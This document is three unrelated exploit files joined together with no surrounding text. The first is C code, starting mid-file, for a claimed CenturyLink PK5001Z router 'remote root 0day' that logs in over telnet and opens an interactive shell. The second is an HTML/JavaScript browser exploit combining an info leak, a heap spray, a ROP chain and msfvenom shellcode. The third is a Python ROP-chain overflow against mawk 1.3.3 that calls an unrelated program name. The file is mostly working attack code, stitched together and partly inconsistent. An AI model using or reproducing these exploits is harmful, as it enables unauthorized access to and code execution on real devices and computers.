char getrp[1024] = "\x7a\x79\x61\x64\x35\x30\x30\x31";
recv(sock, buf, 1024 - 1, 0);
sleep(1);
if (strncmp(getal, END_STRING, strlen(END_STRING)) == 0)
;
if (send(sock, getal, strlen(getal) + 1, 0) < 0)
perro("send");
recv(sock, buf, 1024 - 1, 0);
sleep(1);
if (strncmp(getap, END_STRING, strlen(END_STRING)) == 0)
;
if (send(sock, getap, strlen(getap) + 1, 0) < 0)
perro("send");
sleep(2);
recv(sock, buf, 1024 - 1, 0);
if (strncmp(getrl, END_STRING, strlen(END_STRING)) == 0)
;
if (send(sock, getrl, strlen(getrl) + 1, 0) < 0)
perro("send");
sleep(2);
recv(sock, buf, 1024 - 1, 0);
if (strncmp(getrp, END_STRING, strlen(END_STRING)) == 0)
;
if (send(sock, getrp, strlen(getrp) + 1, 0) < 0)
perro("send");
sleep(2);
}
void send_cmd(int sock, int pid) {
char str[1024] = {0};
while (fgets(str, 1024, stdin) == str) {
if (strncmp(str, END_STRING, strlen(END_STRING)) == 0)
break;
if (send(sock, str, strlen(str) + 1, 0) < 0)
perro("send");
}
kill(pid, SIGKILL);
}
void sys_info(int sock, int pid) {
char buf[1024] = {0};
char sysinfo[1024] = "\nuname -a; id;\n";
if (strncmp(sysinfo, END_STRING, strlen(END_STRING)) == 0)
;
if (send(sock, sysinfo, strlen(sysinfo) + 1, 0) < 0)
perro("send");
sleep(1);
int filled = 0;
while (filled = recv(sock, buf, 1024 - 1, 0)) {
buf[filled] = '\0';
printf("%s", buf);
fflush(stdout);
}
kill(pid, SIGKILL);
}
void receive(int sock) {
char buf[1024] = {0};
int filled = 0;
while (filled = recv(sock, buf, 1024 - 1, 0)) {
buf[filled] = '\0';
printf("%s", buf);
fflush(stdout);
}
}
int main(int argc, char **argv) {
if (argc != 2) {
printf("PK5001Z CenturyLink Router remote root 0day\nEnjoy!\n");
printf(" --oxagast\n");
exit(1);
}
int sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock == -1)
perro("socket");
struct in_addr server_addr;
if (!inet_aton(argv[1], &server_addr))
perro("inet_aton");
struct sockaddr_in connection;
connection.sin_family = AF_INET;
memcpy(&connection.sin_addr, &server_addr, sizeof(server_addr));
connection.sin_port = htons(23);
if (connect(sock, (const struct sockaddr *)&connection, sizeof(connection)) !=
0)
perro("connect");
sleep(1);
int pid_root, pid_sys, pid_shell;
sleep(1);
send_root(sock, pid_root);
if (pid_shell = fork())
sys_info(sock, pid_sys);
if (pid_shell = fork())
send_cmd(sock, pid_shell);
else
receive(sock);
return (0);
}
<!DOCTYPE html>
<html>
<head>
<style>
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
</style>
<script>
var base_leaked_addr = "";
function infoleak() {
var textarea = document.getElementById("textarea");
var frame = document.createElement("iframe");
textarea.appendChild(frame);
frame.contentDocument.onreadystatechange = eventhandler;
form.reset();
}
function eventhandler() {
document.getElementById("textarea").defaultValue = "foo";
// Object replaced here
// one of the side allocations of the audio element
var audioElm = document.createElement("audio");
audioElm.src = "test.mp3";
}
function writeu(base, offs) {
var res = 0;
if (base != 0) { res = base + offs }
else { res = offs }
res = res.toString(16);
while (res.length < 8) res = "0"+res;
return "%u"+res.substring(4,8)+"%u"+res.substring(0,4);
}
function readu(value) {
var uc = escape(value);
var ucsplit = uc.split('%');
var res = parseInt('0x' + ucsplit[2].replace('u', '') + ucsplit[1].replace('u', ''));
return res;
}
function spray() {
// DEPS technique used here - avoid null bytes
var hso = document.createElement("div");
base_leaked_addr = parseInt(base_leaked_addr,16);
var junk = unescape("%u0e0e%u0e0e");
while (junk.length < 0x1000) junk += junk;
var rop = unescape(
writeu(base_leaked_addr,0x56341) +
writeu(base_leaked_addr,0x56341) +
writeu(base_leaked_addr,0x9b7c) +
writeu(0,0xffffffff) +
writeu(base_leaked_addr,0x2a89e) +
writeu(0,0x41414141) +
writeu(base_leaked_addr,0x4e385) +
writeu(0,0x41414141) +
writeu(base_leaked_addr,0x2030f) +
writeu(base_leaked_addr,0x9b7c) +
writeu(0,0x41414141) +
writeu(0,0x41414141) +
writeu(0,0xf07645d5) +
writeu(base_leaked_addr,0x6e002) +
writeu(0,0x41414141) +
writeu(base_leaked_addr,0xaebc) +
writeu(base_leaked_addr,0x9b7c) +
writeu(0,0xffffffbf) +
writeu(base_leaked_addr,0x2a89e) +
writeu(0,0x41414141) +
writeu(base_leaked_addr,0x6361b) +
writeu(base_leaked_addr,0x432cf) +
writeu(0,0x41414141) +
writeu(0,0x41414141) +
writeu(base_leaked_addr,0x9b7c) +
writeu(base_leaked_addr,0x5cef1) +
writeu(base_leaked_addr,0x4177e) +
writeu(base_leaked_addr,0x9b7c) +
writeu(base_leaked_addr,0x1244) +
writeu(base_leaked_addr,0xa819) +
writeu(0,0x41414141) +
writeu(base_leaked_addr,0x2720b) +
"" );
/*
Original VirtualAlloc ROP generated with mona.py - www.corelan.be
Library used "propsys.dll", part of the Windows Search functionality (?)
and last updated Nov 2010. I think it's a good target for our needs.
Fixed to overcome the problem with MOV EAX,80004001 after the PUSHAD instruction
"%u6341%u6af8" + // 0x6af86341 : ,# POP EBP # RETN [PROPSYS.dll]
"%u6341%u6af8" + // 0x6af86341 : ,# skip 4 bytes [PROPSYS.dll]
"%u9b7c%u6af3" + // 0x6af39b7c : ,# POP EAX # RETN 0x04 [PROPSYS.dll]
"%uffff%uffff" + // 0xffffffff : ,# Value to negate, will become 0x00000001
"%ua89e%u6af5" + // 0x6af5a89e : ,# NEG EAX # RETN [PROPSYS.dll]
"%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
"%ue385%u6af7" + // 0x6af7e385 : ,# PUSH EAX # ADD AL,5E # XOR EAX,EAX # POP EBX # POP EDI # POP EBP # RETN 0x08 [PROPSYS.dll]
"%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
"%u4141%u4141" + // 0x41414141 : ,# Filler (compensate) --> changed to 0x6af5030f : # POP EBX # RETN ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ}
"%u9b7c%u6af3" + // 0x6af39b7c : ,# POP EAX # RETN 0x04 [PROPSYS.dll]
"%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
"%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
"%u45d5%uf076" + // 0xf07645d5 : ,# put delta into eax (-> put 0x00001000 into edx)
"%ue002%u6af9" + // 0x6af9e002 : ,# ADD EAX,0F89CA2B # RETN [PROPSYS.dll]
"%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
"%uaebc%u6af3" + // 0x6af3aebc : ,# XCHG EAX,EDX # RETN [PROPSYS.dll]
"%u9b7c%u6af3" + // 0x6af39b7c : ,# POP EAX # RETN 0x04 [PROPSYS.dll]
"%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040
"%ua89e%u6af5" + // 0x6af5a89e : ,# NEG EAX # RETN [PROPSYS.dll]
"%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
"%u361b%u6af9" + // 0x6af9361b : ,# XCHG EAX,ECX # ADD DL,B # DEC ECX # RETN 0x08 [PROPSYS.dll]
"%u32cf%u6af7" + // 0x6af732cf : ,# POP EDI # RETN [PROPSYS.dll]
"%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
"%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
"%u40bd%u6af4" + // 0x6af440bd : ,# RETN (ROP NOP) [PROPSYS.dll]
"%ucef1%u6af8" + // 0x6af8cef1 : ,# POP ESI # RETN [PROPSYS.dll]
"%u177e%u6af7" + // 0x6af7177e : ,# JMP [EAX] [PROPSYS.dll]
"%u9b7c%u6af3" + // 0x6af39b7c : ,# POP EAX # RETN 0x04 [PROPSYS.dll]
"%u1244%u6af3" + // 0x6af31244 : ,# ptr to &VirtualAlloc() [IAT PROPSYS.dll]
"%u6af8" + // 0x6af80a14 : ,# PUSHAD # ADD AL,0 # MOV EAX,80004001 # POP EBP # RETN 0x08 [PROPSYS.dll] --> changed to 0x6af3a819 : # PUSHAD # CMP EAX,0C68B6AF3 # POP ESI # RETN ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ}
"%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
"%u720b%u6af5" + // 0x6af5720b : ,# ptr to 'jmp esp' [PROPSYS.dll]
*/
// Move ESP to the VirtualAlloc ROP chain
var stack_shift_rop = unescape(
writeu(0,235802130) +
writeu(base_leaked_addr,0x2030f) + // 0x6af5030f : # POP EBX # RETN ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ}
writeu(0,0x0e0e1258) +
writeu(base_leaked_addr,0x28002) + // 0x6af58002 : # MOV EAX,EBX # POP EBX # POP EBP # RETN 0x08 ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ}
writeu(0,0x41414141) +
writeu(0,0x41414141) +
writeu(base_leaked_addr,0x0b473) + //0x6af3b473 : # XCHG EAX,ESP # RETN ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ}
writeu(0,0x41414141) +
writeu(0,0x41414141) +
"");
// root@kali:~# msfvenom -p windows/exec cmd=calc.exe -b "\x00" -f js_le
// ~2854 bytes max
var shellcode = unescape("%uec83%u4070" + // move stack pointer away to avoid shellcode corruption
"%ucadb%ub6ba%u0f7b%ud99f%u2474%u5ef4%uc929%u31b1%uee83%u31fc%u1456%u5603%u99a2%u63fa%udf22%u9c05%u80b2%u798c%u8083%u0aeb%u30b3%u5e7f%uba3f%u4b2d%uceb4%u7cf9%u647d%ub3dc%ud57e%ud51c%u24fc%u3571%ue73d%u3484%u1a7a%u6464%u50d3%u99db%u2c50%u12e0%ua02a%uc660%uc3fa%u5941%u9a71%u5b41%u9656%u43cb%u93bb%uf882%u6f0f%u2915%u905e%u14ba%u636f%u51c2%u9c57%uabb1%u21a4%u6fc2%ufdd7%u7447%u757f%u50ff%u5a7e%u1266%u178c%u7cec%ua690%uf721%u23ac%ud8c4%u7725%ufce3%u236e%ua58a%u82ca%ub6b3%u7bb5%ubc16%u6f5b%u9f2b%u6e31%ua5b9%u7077%ua5c1%u1927%u2ef0%u5ea8%ue50d%u918d%ua447%u39a7%u3c0e%u27fa%ueab1%u5e38%u1f32%ua5c0%u6a2a%ue2c5%u86ec%u7bb7%ua899%u7b64%uca88%uefeb%u2350%u978e%u3bf3" +
"");
var xchg = unescape(writeu(base_leaked_addr, 0x0b473)); // Initial EIP control ---> 0x6af3b473 : # XCHG EAX,ESP # RETN ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ}
var fix1 = 0x15c;
var fixop = unescape("%u0e0e%u0e0e");
var offset_to_stack_shift = 0x6f7;
var offset_to_xchg = 0xd2+2;
// Jumping a bit around here, pretty sure this can be simplified but hey... it works
data = junk.substring(0,fix1-rop.length) + rop + fixop + shellcode + junk.substring(0,offset_to_stack_shift-fix1-fixop.length-shellcode.length) + stack_shift_rop + junk.substring(0,offset_to_xchg-stack_shift_rop.length) + xchg;
data += junk.substring(0,0x800-offset_to_stack_shift-offset_to_xchg-xchg.length);
while (data.length < 0x80000) data += data;
for (var i = 0; i < 0x350; i++)
{
var obj = document.createElement("button");
obj.title = data.substring(0,(0x7fb00-2)/2);
hso.appendChild(obj);
}
}
function boom() {
document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
th1.align = "right";
}
setTimeout(function() {
var txt = document.getElementById("textarea");
var il = txt.value.substring(0,2);
var leaked_addr = readu(il);
base_leaked_addr = leaked_addr - 0xbacc; // base of propsys
base_leaked_addr = base_leaked_addr.toString(16);
spray();
boom();
}, 1000); // can be reduced
</script>
</head>
<body onload=infoleak()>
<form id="form">
<textarea id="textarea" style="display:none" cols="81">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</textarea>
</form>
<script>
</script>
<table cellspacing="0">
<tr class="class1">
<th id="th1" colspan="0" width=2000000></th>
<th class="class2" width=0><div class="class2"></div></th>
</table>
</body>
</html>
#!/usr/bin/python
# Developed using Exploit Pack - http://exploitpack.com - <jsacco@exploitpack.com>
# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com
# Tested on: GNU/Linux - Kali 2017.1 Release
#
# Description: MAWK ( AWK Interpreter ) 1.3.3-17 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate boundary-checks on user-supplied input.
#
# Program affected: mawk is an interpreter for the AWK Programming Language. The AWK language is useful
# for manipulation of data files, text retrieval and processing, and for prototyping and experimenting with algorithms.
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
import os, subprocess
from struct import pack
ropchain = "A"*1038 # junk
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
edi ; pop ebp ; ret
ropchain += pack('<I', 0x0811abe0) # @ .data
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x0807b744) # pop eax ; ret
ropchain += '/bin'
ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop
ebx ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
edi ; pop ebp ; ret
ropchain += pack('<I', 0x0811abe4) # @ .data + 4
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x0807b744) # pop eax ; ret
ropchain += '//sh'
ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop
ebx ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
edi ; pop ebp ; ret
ropchain += pack('<I', 0x0811abe8) # @ .data + 8
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop
ebx ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080dcf4b) # pop ebx ; pop esi ; pop edi ; ret
ropchain += pack('<I', 0x0811abe0) # @ .data
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x08067b43) # pop ecx ; ret
ropchain += pack('<I', 0x0811abe8) # @ .data + 8
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
edi ; pop ebp ; ret
ropchain += pack('<I', 0x0811abe8) # @ .data + 8
ropchain += pack('<I', 0x0811abe0) # padding without overwrite ebx
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080c861f) # int 0x80
try:
print("[*] MAWK 1.3.3 Stack-Based Buffer Overflow by Juan Sacco")
print("[*] Please wait.. running")
subprocess.call(["jad", ropchain])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "MAWK not found!"
else:
print "Error executing exploit"
raise